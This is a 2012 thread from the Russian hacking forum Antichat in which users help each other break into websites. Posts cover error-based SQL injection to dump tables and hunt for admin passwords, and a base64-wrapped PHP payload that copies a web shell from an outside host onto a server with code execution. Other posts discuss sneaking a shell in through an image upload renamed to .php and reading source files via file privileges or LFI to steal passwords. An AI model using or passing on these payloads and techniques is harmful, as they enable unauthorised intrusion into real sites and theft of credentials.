HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #19411  
Старый 31.01.2012, 13:58
pirat0
Guest
Сообщений: n/a
Провел на форуме:
23576

Репутация: -1
По умолчанию

2Ereee,

я не понял твой запрос, но дело в том что я вывожу таблицы с ошибки (Duplicate entry), вставил твой запрос написало bad request?
 
Ответить с цитированием

  #19412  
Старый 31.01.2012, 14:12
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Цитата:
Сообщение от pirat0  
pirat0 said:
2Ereee,
я не понял твой запрос, но дело в том что я вывожу таблицы с ошибки (Duplicate entry), вставил твой запрос написало bad request?
Ну так все выведи через лимит. Потом найди таблицы типа permissons и т.д.
 
Ответить с цитированием

  #19413  
Старый 31.01.2012, 15:21
er9j6@
Guest
Сообщений: n/a
Провел на форуме:
107835

Репутация: 23
По умолчанию

Есть выполнение php скрипта на сайте, как залить шелл?

http://www.site.com/index.php?s=10&id=phpinfo();

mq=on
 
Ответить с цитированием

  #19414  
Старый 31.01.2012, 15:24
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

base64_decode([]);

где [] — copy('http://site1.tu/shell.txt', './shell.php'); в base64
 
Ответить с цитированием

  #19415  
Старый 31.01.2012, 16:23
pirat0
Guest
Сообщений: n/a
Провел на форуме:
23576

Репутация: -1
По умолчанию

Цитата:
Сообщение от Ereee  
Ereee said:
Ну так все выведи через лимит. Потом найди таблицы типа permissons и т.д.
так в этом и вся проблема, таблицы типа user_rights, user_permisson, admin_user и т.п. нет.

а ты говорил что пасс может быть в файле, это как то можно проверить?? (всмисле через запрос к мускулу)
 
Ответить с цитированием

  #19416  
Старый 31.01.2012, 16:26
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от pirat0  
pirat0 said:
так в этом и вся проблема, таблицы типа user_rights, user_permisson, admin_user и т.п. нет.
а ты говорил что пасс может быть в файле, это как то можно проверить?? (всмисле через запрос к мускулу)
пасс в файле, такое встречается на околоафриканских сайтах, или в ретро web -е, если нету таблиц значит они в другой базе, если нету таблиц для админа значит авторизация через пароли которые хранятся внутри скрипта, включите фантазию
 
Ответить с цитированием

  #19417  
Старый 31.01.2012, 16:34
good.god
Участник форума
Регистрация: 23.11.2009
Сообщений: 107
Провел на форуме:
1298413

Репутация: 44
Отправить сообщение для good.god с помощью ICQ
По умолчанию

Надоело уже плодить темы с моими вопросами по залитию шелла, так что если я тут задам свой небольшой вопрос, надеюсь никто не будет возражать?

Могу менять имя и расширение загружаемого файла через пост запрос, но, шелл в формате jpg не грузит, так как при загрузке меняются размеры изображения и выкидывается ошибка, если в картинку в конец прописать мини-шелл и загрузить (естественно переименовать расширение в пхп), то он не работает, и вижу я только код картинки.

Кто что посоветует сделать?
 
Ответить с цитированием

  #19418  
Старый 31.01.2012, 16:38
pirat0
Guest
Сообщений: n/a
Провел на форуме:
23576

Репутация: -1
По умолчанию

Цитата:
Сообщение от Konqi  
Konqi said:
если нету таблиц значит они в другой базе
базы тоже проверял, только две - information_schema и текущяя

Цитата:
Сообщение от Konqi  
Konqi said:
если нету таблиц для админа значит авторизация через пароли которые хранятся внутри скрипта, включите фантазию
где про это можно поподробнее прочитать??
 
Ответить с цитированием

  #19419  
Старый 31.01.2012, 16:46
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от pirat0  
pirat0 said:
базы тоже проверял, только две - information_schema и текущяя
где про это можно поподробнее прочитать??
о чем прочитать? нечего там прочитать, если этот тот случий тогда вам нужен file_priv или другие средства (читалка чтоли) чтоб смотреть исходники файлов, стянуть пароль
 
Ответить с цитированием

  #19420  
Старый 31.01.2012, 16:56
pirat0
Guest
Сообщений: n/a
Провел на форуме:
23576

Репутация: -1
По умолчанию

Цитата:
Сообщение от Konqi  
Konqi said:
о чем прочитать? нечего там прочитать, если этот тот случий тогда вам нужен file_priv или другие средства (читалка чтоли) чтоб смотреть исходники файлов, стянуть пароль
command denied to user - file_priv нету

(читалка это я так понимаю из розряда LFI??)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
 


Быстрый переход




ANTICHAT.XYZ